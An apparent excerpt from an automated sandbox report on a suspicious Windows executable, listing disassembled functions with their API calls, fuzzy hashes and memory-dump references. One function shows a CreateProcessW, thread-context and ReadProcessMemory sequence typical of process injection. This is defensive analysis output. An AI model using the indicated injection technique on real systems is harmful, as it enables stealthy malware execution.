Opcode Fuzzy Hash: f6db833a63d72d3df088724b4eec6e0040a35f05dcb7eb1a111f5fa482da1dff
Instruction Fuzzy Hash: C5D05B7954030D6BDB50DB94DC0DFB6773CDB04700F0042B1BA5491191DA745564DB91

Function 000ECADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe13f214cd4412f893f22f0037d23e9ddc23c8be8aff9baedfaaee0bdcb31651
Instruction ID: 0c7869809e04f1b773cbc6951be14b7dafa5022de5f28de2960dc4d455d93bad
Opcode Fuzzy Hash: fe13f214cd4412f893f22f0037d23e9ddc23c8be8aff9baedfaaee0bdcb31651
Instruction Fuzzy Hash: 58F14871A083419FD714DF29C480A6ABBE5FF89314F14892EF8999B352D731E906CF92

Function 0007F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00090162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00090193
Part of subcall function 00090162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0009019B
Part of subcall function 00090162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000901A6
Part of subcall function 00090162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000901B1
Part of subcall function 00090162: MapVirtualKeyW.USER32(00000011,00000000), ref: 000901B9
Part of subcall function 00090162: MapVirtualKeyW.USER32(00000012,00000000), ref: 000901C1

Part of subcall function 000860F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0007F930), ref: 00086154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0007F9CD
OleInitialize.OLE32(00000000), ref: 0007FA4A
CloseHandle.KERNEL32(00000000), ref: 000B45C8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: cbd7d72d14d399c58fda656a3363084b01a8632d4b4167191589f960ffbce0ee
Instruction ID: 7385908e2a1beafb34451b4cca048aaa8940ffd5f1a5f2f361799de51797f0f6
Opcode Fuzzy Hash: cbd7d72d14d399c58fda656a3363084b01a8632d4b4167191589f960ffbce0ee
Instruction Fuzzy Hash: 7F81BDB0905A40CFC388EF39A9456A97BE7FB98B06790812AD058DBB72FB7444C4CF15

Function 0007434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00074370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00074415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00074432

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: d8e61a45b7a6c1130c8d17a5ecc034f588ebec46acf16faa95c82907779a4d23
Instruction ID: 5b9947e0044812d6d5ad4ee670fb6adbcb3fa765e6f936422a573eb746fbe900
Opcode Fuzzy Hash: d8e61a45b7a6c1130c8d17a5ecc034f588ebec46acf16faa95c82907779a4d23
Instruction Fuzzy Hash: B131D2B0904701CFD760DF74D8846ABBBF8FB48708F00492EF69E82251E774A984CB96

Function 0009571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00095733

Part of subcall function 0009A16B: __NMSG_WRITE.LIBCMT ref: 0009A192
Part of subcall function 0009A16B: __NMSG_WRITE.LIBCMT ref: 0009A19C

__NMSG_WRITE.LIBCMT ref: 0009573A

Part of subcall function 0009A1C8: GetModuleFileNameW.KERNEL32(00000000,001333BA,00000104,?,00000001,00000000), ref: 0009A25A
Part of subcall function 0009A1C8: ___crtMessageBoxW.LIBCMT ref: 0009A308

Part of subcall function 0009309F: ___crtCorExitProcess.LIBCMT ref: 000930A5
Part of subcall function 0009309F: ExitProcess.KERNEL32 ref: 000930AE

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00090DD3,?), ref: 0009575F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 817a62401bcae33b88e1de51375ad408193ae7de8423751b3f670051f8fca76e
Instruction ID: 676973282f669dfaaa1ee65f9a2d5b7eea424fe6c9f7cd0c43f8713691a2d76d
Opcode Fuzzy Hash: 817a62401bcae33b88e1de51375ad408193ae7de8423751b3f670051f8fca76e
Instruction Fuzzy Hash: 1901F531348B01DADE5227B6FC96BAEF3889F82363F100025F515DA282DF708E81B760

Function 000D98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000D9548,?,?,?,?,?,00000004), ref: 000D98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000D9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000D98D1
CloseHandle.KERNEL32(00000000,?,000D9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000D98D8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: adf43462b94ff19f6e9831d0c11f6c98ac3bc2747c51a2d15182396d14d9953f
Instruction ID: ba45bcb030884dd22884cb9be17c0bbb0dc67b9cc19b1234e8bd905c3addd4d6
Opcode Fuzzy Hash: adf43462b94ff19f6e9831d0c11f6c98ac3bc2747c51a2d15182396d14d9953f
Instruction Fuzzy Hash: 17E08632140315BBE7211B54EC09FEE7B59AF06B60F144120FB14694E087B51621E798

Function 000D8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000D8D1B

Part of subcall function 00092D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00099A24), ref: 00092D69
Part of subcall function 00092D55: GetLastError.KERNEL32(00000000,?,00099A24), ref: 00092D7B

_free.LIBCMT ref: 000D8D2C
_free.LIBCMT ref: 000D8D3E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
Instruction ID: ce7c60fb131c71b11c40916acba3d04aeb1a93354fa1673b937462329f2d8e48
Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
Instruction Fuzzy Hash: 68E017A160270166CF64A6B8A940FD333ED4F98352B14491EB40DD72CBCE64F8829238

Function 0007A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 000AFC01

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 4614df68037cfb8485a76cea3afc9a00be9f8697c3cb70777b4ce7d1259519cb
Instruction ID: 859fe6d3983b887e4215c5d5d6f3ecb51ac40ebab51d8cbea0c4be718dc79252
Opcode Fuzzy Hash: 4614df68037cfb8485a76cea3afc9a00be9f8697c3cb70777b4ce7d1259519cb
Instruction Fuzzy Hash: 04224670A08201DFCB24DF14C494B6EB7E1BF86304F15C96DE89A8B262D739ED41CB86

Function 00074C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00074CBA

Strings

EA06, xrefs: 000AD8CC

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 35ded46911bfc53b9afcbb83e5b648cd44b8b9ac7257e6401b6f41af83a27897
Instruction ID: 5c35acafa85d69b17ef2fc6b1ea4e33f1e88581f19b67204072f8d41a3a13fc0
Opcode Fuzzy Hash: 35ded46911bfc53b9afcbb83e5b648cd44b8b9ac7257e6401b6f41af83a27897
Instruction Fuzzy Hash: ED415C21E041585BDF329B9488917FE7BA29B46310F28C475ECCE9B283D72C9D4483A6

Function 000747D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00074834

Part of subcall function 0009336C: __lock.LIBCMT ref: 00093372
Part of subcall function 0009336C: DecodePointer.KERNEL32(00000001,?,00074849,000C7C74), ref: 0009337E
Part of subcall function 0009336C: EncodePointer.KERNEL32(?,?,00074849,000C7C74), ref: 00093389

Part of subcall function 000748FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00074915
Part of subcall function 000748FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0007492A

Part of subcall function 00073B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00073B68
Part of subcall function 00073B3A: IsDebuggerPresent.KERNEL32 ref: 00073B7A
Part of subcall function 00073B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,001352F8,001352E0,?,?), ref: 00073BEB
Part of subcall function 00073B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00073C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00074874

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: c73cb8e0f8658affe2a427b5e025ce59d6f44dcc4d4bdcd71645042638f5a8b4
Instruction ID: 4f133cfea730c164fef6486b653b95acc654e6802231154886a955c65270ef03
Opcode Fuzzy Hash: c73cb8e0f8658affe2a427b5e025ce59d6f44dcc4d4bdcd71645042638f5a8b4
Instruction Fuzzy Hash: 6311CD718083059BC700EF28D84595EBBE8EF85740F00851EF058832B2DB749688CB96

Function 00075C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00075821,?,?,?,?), ref: 00075CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00075821,?,?,?,?), ref: 000ADD73

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f49b9c4f3b5450dc3ca5a67b27a4d44a4b2bad69c447ed45cd0629e9234ee5e2
Instruction ID: e9edb7a8328ba009ab8c7b15b2ea51dc2d09bd4915b90648997be502ea24e8e3
Opcode Fuzzy Hash: f49b9c4f3b5450dc3ca5a67b27a4d44a4b2bad69c447ed45cd0629e9234ee5e2
Instruction Fuzzy Hash: D8019670244708BEF3610E24CC8AFB63BDCAB01769F10C319BAD99A1E0C6F91C45CB54

Function 00090DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0009571C: __FF_MSGBANNER.LIBCMT ref: 00095733
Part of subcall function 0009571C: __NMSG_WRITE.LIBCMT ref: 0009573A
Part of subcall function 0009571C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00090DD3,?), ref: 0009575F

std::exception::exception.LIBCMT ref: 00090DEC
__CxxThrowException@8.LIBCMT ref: 00090E01

Part of subcall function 0009859B: RaiseException.KERNEL32(?,?,?,00129E78,00000000,?,?,?,?,00090E06,?,00129E78,?,00000001), ref: 000985F0

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 6afab81c5feb997124feaf635b2d811947bb62ed3faa931e1d49f7847127b7f3
Instruction ID: d10518d6ec10e3ff037b2d4604cf5f5ce170cbdc403048b43ae4c56d6a7972fc
Opcode Fuzzy Hash: 6afab81c5feb997124feaf635b2d811947bb62ed3faa931e1d49f7847127b7f3
Instruction Fuzzy Hash: E5F0A431504219AADF10AAD8ED059DFB7AD9F01311F104429F958A6682DFB19E50E7D1

Function 000955FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0009562C
__lock_file.LIBCMT ref: 0009564D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 19b8137878cee4d3e77a4d67b12983dbd31ec6f28c34870ee3c6a60fd0d082e9
Instruction ID: 220c8e444e75464dc185e7dbbd363516c89b85c39971642544ecdf077ffa46fd
Opcode Fuzzy Hash: 19b8137878cee4d3e77a4d67b12983dbd31ec6f28c34870ee3c6a60fd0d082e9
Instruction Fuzzy Hash: 5901DB72801A08EBCF53AF669C024DF7FB1AF51362F558115F8245B2A2DB318A51FF91

Function 000953A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

__lock_file.LIBCMT ref: 000953EB

Part of subcall function 00096C11: __lock.LIBCMT ref: 00096C34

__fclose_nolock.LIBCMT ref: 000953F6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 2201cb95afde7ba55dd71c589147cdc2aa19fecc767db1c29c604461430696b8
Instruction ID: 098c018d96aee042c40dfa73a042182edbabb083be3337b5312e875c5101321f
Opcode Fuzzy Hash: 2201cb95afde7ba55dd71c589147cdc2aa19fecc767db1c29c604461430696b8
Instruction Fuzzy Hash: 8CF09671801A049ADF226F769C027ED67F06F42376F25C104A424AB2C2CBBC8A417B55

Function 014B129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014B1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014B1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014B1B13

Memory Dump Source

Source File: 00000000.00000002.2197145327.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14b0000_25IvlOVEB1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: ab2e29e00be2c07b05e5faf0c0fca7b8e4f3f1bacfc3afdc680b2146a7cc7a3e
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 4712CD24E24658C6EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4F81CF5A

Function 0007F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9f82cd8d8d29f31848c4fbc3a1490c91c385e07612f0b5357362a4548cd177
Instruction ID: 03b4f5606818d6287c492db2eb3777b5782018305248ac848750ca518cbf9d28
Opcode Fuzzy Hash: ed9f82cd8d8d29f31848c4fbc3a1490c91c385e07612f0b5357362a4548cd177
Instruction Fuzzy Hash: 41618B70A0020A9FCB60DF64C881ABEB7F5EF05304F14847DE91A97292D779EE51CB65

Function 00081FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd59bc95a256e7d968d7b046069fdfc57075d6d476d7f9b1705a674a72219cc0
Instruction ID: 4431f27f3ac0458fe186f211380db2eecaded16e0f7c707bdc1a3dea66d98fda
Opcode Fuzzy Hash: fd59bc95a256e7d968d7b046069fdfc57075d6d476d7f9b1705a674a72219cc0
Instruction Fuzzy Hash: E6516C31A00604AFCF24EB68C991EEE77A6AF45310F148568F94AAB393DA35ED01CB55

Function 00075AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00075B96

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5273d1123e5cb2d7bfe383870ca36df12fba848b7217e425bd245241e6b346d
Instruction ID: 26bdecafec31e58652e5adaa57bf83aed33923d85c234e176035ce7d7a16cfa4
Opcode Fuzzy Hash: d5273d1123e5cb2d7bfe383870ca36df12fba848b7217e425bd245241e6b346d
Instruction Fuzzy Hash: 47316D71A00A49AFCB18CF6CC884AADF7B5FF88311F14C62AD81993710D7B4B990CB94

Function 000AFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 000AFCB7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8a6b072d160e2071d85711b65c2db47d97a4aae920be2505dfbe4f9284d637ba
Instruction ID: 5aa25c9e4d760c22b239db523596e550150399100f0514fad778a50b292b7029
Opcode Fuzzy Hash: 8a6b072d160e2071d85711b65c2db47d97a4aae920be2505dfbe4f9284d637ba
Instruction Fuzzy Hash: 27411674A043419FDB25DF14C444B6ABBE1BF85318F09C8ACE89A8B762C736EC45CB56

Function 0007C5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0007C5DD

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

